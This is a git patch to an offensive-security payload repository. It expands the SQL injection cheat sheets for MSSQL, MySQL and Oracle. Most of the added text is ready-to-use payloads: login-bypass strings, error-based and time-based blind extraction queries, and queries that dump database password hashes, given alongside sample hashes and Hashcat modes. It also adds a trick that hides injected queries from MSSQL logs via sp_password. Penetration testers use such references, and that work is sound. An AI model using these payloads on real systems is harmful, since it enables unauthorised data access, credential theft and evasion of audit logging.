From 6861c46fcdb7f75c84725c82608730336f59a1fb Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 14 Apr 2023 17:45:45 +0200 Subject: [PATCH] MySQL MSSQL Oracle SQL Update --- SQL Injection/MSSQL Injection.md | 76 +++++++++++++++++------ SQL Injection/MySQL Injection.md | 91 ++++++++++++++++++++++------ SQL Injection/OracleSQL Injection.md | 57 +++++++++++++++-- SQL Injection/README.md | 15 +++-- 4 files changed, 188 insertions(+), 51 deletions(-) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index ce645d4..80b2f9d 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -2,15 +2,16 @@ ## Summary +* [MSSQL Default Databases](#mssql-default-databases) * [MSSQL Comments](#mssql-comments) * [MSSQL User](#mssql-user) * [MSSQL Version](#mssql-version) * [MSSQL Hostname](#mssql-hostname) -* [MSSQL Database name](#mssql-database-name) +* [MSSQL Database Name](#mssql-database-name) +* [MSSQL Database Credentials](#mssql-database-credentials) * [MSSQL List databases](#mssql-list-databases) * [MSSQL List columns](#mssql-list-columns) * [MSSQL List tables](#mssql-list-tables) -* [MSSQL Extract user/password](#mssql-extract-userpassword) * [MSSQL Union Based](#mssql-union-based) * [MSSQL Error Based](#mssql-error-based) * [MSSQL Blind Based](#mssql-blind-based) @@ -25,12 +26,27 @@ * [MSSQL Trusted Links](#mssql-trusted-links) * [MSSQL List permissions](#mssql-list-permissions) + +## MSSQL Default Databases + +| Name | Description | +|-----------------------|---------------------------------------| +| pubs | Not available on MSSQL 2005 | +| model | Available in all versions | +| msdb | Available in all versions | +| tempdb | Available in all versions | +| northwind | Available in all versions | +| information_schema | Availalble from MSSQL 2000 and higher | + + ## MSSQL Comments -```sql --- comment goes here -/* comment goes here */ -``` +| Type | Description | +|----------------------------|-----------------------------------| +| `/* MSSQL Comment */` | C-style comment | +| `-- -` | SQL comment | +| `;%00` | Null byte | + ## MSSQL User @@ -41,7 +57,7 @@ SELECT system_user; SELECT user; ``` -## MSSQL version +## MSSQL Version ```sql SELECT @@version @@ -51,7 +67,11 @@ SELECT @@version ```sql SELECT HOST_NAME() -SELECT @@hostname; +SELECT @@hostname +SELECT @@SERVERNAME +SELECT SERVERPROPERTY('productversion') +SELECT SERVERPROPERTY('productlevel') +SELECT SERVERPROPERTY('edition'); ``` ## MSSQL Database name @@ -60,6 +80,22 @@ SELECT @@hostname; SELECT DB_NAME() ``` + +## MSSQL Database Credentials + +* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578` + ```sql + SELECT name, password FROM master..sysxlogins + SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins + -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer + ``` +* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe` + ```sql + SELECT name, password_hash FROM master.sys.sql_logins + SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins + ``` + + ## MSSQL List databases ```sql @@ -88,17 +124,6 @@ SELECT table_catalog, table_name FROM information_schema.columns SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimeter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+) ``` -## MSSQL Extract user/password - -```sql -MSSQL 2000: -SELECT name, password FROM master..sysxlogins -SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) - -MSSQL 2005 -SELECT name, password_hash FROM master.sys.sql_logins -SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -``` ## MSSQL Union Based @@ -141,6 +166,7 @@ AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- - AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97 AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64-- +AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A' AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90 @@ -159,7 +185,8 @@ ProductID=1';waitfor delay '0:0:10'-- ProductID=1');waitfor delay '0:0:10'-- ProductID=1));waitfor delay '0:0:10'-- -IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: -- +IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' +IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0'; ``` ## MSSQL Stacked Query @@ -325,6 +352,15 @@ Check if current user is a member of the specified server role. SELECT is_srvrolemember('sysadmin'); ``` +## MSSQL OPSEC + +Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password` + +```sql +-- 'sp_password' was found in the text of this event. +-- The text has been replaced with this comment for security reasons. +``` + ## References * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 393ab40..683b8b6 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -2,7 +2,8 @@ ## Summary -* [MYSQL Comment](#mysql-comment) +* [MYSQL Default Databases](#mysql-default-databases) +* [MYSQL Comments](#mysql-comments) * [MYSQL Union Based](#mysql-union-based) * [Detect columns number](#detect-columns-number) * [Extract database with information_schema](#extract-database-with-information_schema) @@ -35,15 +36,61 @@ * [References](#references) -## MYSQL comment +## MYSQL Default Databases -```sql -# MYSQL Comment --- comment [Note the space after the double dash] -/* MYSQL Comment */ -/*! MYSQL Special SQL */ -/*!32302 10*/ Comment for MYSQL version 3.23.02 -``` +| Name | Description | +|--------------------|--------------------------| +| mysql | Requires root privileges | +| information_schema | Availalble from version 5 and higher | + + +## MYSQL comments + +| Type | Description | +|----------------------------|-----------------------------------| +| `#` | Hash comment | +| `/* MYSQL Comment */` | C-style comment | +| `/*! MYSQL Special SQL */` | Special SQL | +| `/*!32302 10*/` | Comment for MYSQL version 3.23.02 | +| `-- -` | SQL comment | +| `;%00` | Nullbyte | +| \` | Backtick | + + +## MYSQL Testing Injection + +* **Strings**: Query like `SELECT * FROM Table WHERE id = 'FUZZ';` + ``` + ' False + '' True + " False + "" True + \ False + \\ True + ``` + +* **Numeric**: Query like `SELECT * FROM Table WHERE id = FUZZ;` + ```ps1 + AND 1 True + AND 0 False + AND true True + AND false False + 1-false Returns 1 if vulnerable + 1-true Returns 0 if vulnerable + 1*56 Returns 56 if vulnerable + 1*56 Returns 1 if not vulnerable + ``` + +* **Login**: Query like `SELECT * FROM Users WHERE username = 'FUZZ1' AND password = 'FUZZ2';` + ```ps1 + ' OR '1 + ' OR 1 -- - + " OR "" = " + " OR 1 = 1 -- - + '=' + 'LIKE' + '=0--+ + ``` ## MYSQL Union Based @@ -177,9 +224,6 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se ``` - - - ## MYSQL Error Based ### MYSQL Error Based - Basic @@ -191,6 +235,7 @@ Works with `MySQL >= 4.1` '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' ``` + ### MYSQL Error Based - UpdateXML function ```sql @@ -208,6 +253,7 @@ Shorter to read: ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- - ``` + ### MYSQL Error Based - Extractvalue function Works with `MySQL >= 5.1` @@ -220,6 +266,7 @@ Works with `MySQL >= 5.1` ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- ``` + ### MYSQL Error Based - NAME_CONST function (only for constants) Works with `MySQL >= 5.0` @@ -230,6 +277,7 @@ Works with `MySQL >= 5.0` ?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)-- ``` + ## MYSQL Blind ### MYSQL Blind with substring equivalent @@ -306,13 +354,17 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l'; The following SQL codes will delay the output from MySQL. -```sql -+BENCHMARK(40000000,SHA1(1337))+ -'%2Bbenchmark(3200,SHA1(1))%2B' -AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1 -RLIKE SLEEP([SLEEPTIME]) -OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) -``` +* MySQL 4/5 : `BENCHMARK()` + ```sql + +BENCHMARK(40000000,SHA1(1337))+ + '%2Bbenchmark(3200,SHA1(1))%2B' + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1 + ``` +* MySQL 5: `SLEEP()` + ```sql + RLIKE SLEEP([SLEEPTIME]) + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + ``` ### Using SLEEP in a subselect @@ -342,6 +394,7 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) ?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2 ``` + ## MYSQL DIOS - Dump in One Shot ```sql diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 36d0514..6aa649d 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -2,8 +2,12 @@ ## Summary -* [Oracle SQL version](#oracle-sql-version) -* [Oracle SQL database name](#oracle-sql-database-name) +* [Oracle SQL Default Databases](#oracle-sql-default-databases) +* [Oracle SQL Comments](#oracle-sql-comments) +* [Oracle SQL Version](#oracle-sql-version) +* [Oracle SQL Hostname](#oracle-sql-hostname) +* [Oracle SQL Database Name](#oracle-sql-database-name) +* [Oracle SQL Database Credentials](#oracle-sql-database-credentials) * [Oracle SQL List databases](#oracle-sql-list-databases) * [Oracle SQL List columns](#oracle-sql-list-columns) * [Oracle SQL List tables](#oracle-sql-list-tables) @@ -13,13 +17,42 @@ * [Oracle SQL Command execution](#oracle-sql-command-execution) * [References](#references) -## Oracle SQL version + +## Oracle SQL Default Databases + +| Name | Description | +|--------------------|---------------------------| +| SYSTEM | Available in all versions | +| SYSAUX | Available in all versions | + + +## Oracle SQL Comments + +| Type | Description | +|----------------------------|-----------------------------------| +| `-- -` | SQL comment | + + +## Oracle SQL Version ```sql SELECT user FROM dual UNION SELECT * FROM v$version +SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; +SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; +SELECT version FROM v$instance; ``` -## Oracle SQL database name +## Oracle SQL Hostname + +```sql +SELECT host_name FROM v$instance; (Privileged) +SELECT UTL_INADDR.get_host_name FROM dual; +SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; +SELECT UTL_INADDR.get_host_address FROM dual; +``` + + +## Oracle SQL Database Name ```sql SELECT global_name FROM global_name; @@ -28,6 +61,15 @@ SELECT instance_name FROM V$INSTANCE; SELECT SYS.DATABASE_NAME FROM DUAL; ``` +## Oracle SQL Database Credentials + +| Query | Description | +|-----------------------------------------|---------------------------| +| `SELECT username FROM all_users;` | Available on all versions | +| `SELECT name, password from sys.user$;` | Privileged, <= 10g | +| `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g | + + ## Oracle SQL List Databases ```sql @@ -71,12 +113,14 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; | Column message exists in table log_table | SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; | | First letter of first message is t | SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%'; | + ## Oracle SQL Time based ```sql -AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/ +AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ``` + ## Oracle SQL Command Execution * [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat) @@ -140,4 +184,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; * [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle) * [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf) * [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) -* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc) \ No newline at end of file +* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc) +* [WebSec CheatSheet - Oracle](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases) \ No newline at end of file diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 0ed8607..13be815 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -10,12 +10,15 @@ Attempting to manipulate SQL queries may have goals including: ## Summary -* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md) -* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md) -* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md) -* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) -* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md) -* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md) +* [CheatSheets](#cheatsheets) + * [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md) + * [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md) + * [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md) + * [PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) + * [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md) + * [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md) + * [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md) + * [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md) * [Entry point detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [SQL injection using SQLmap](#sql-injection-using-sqlmap)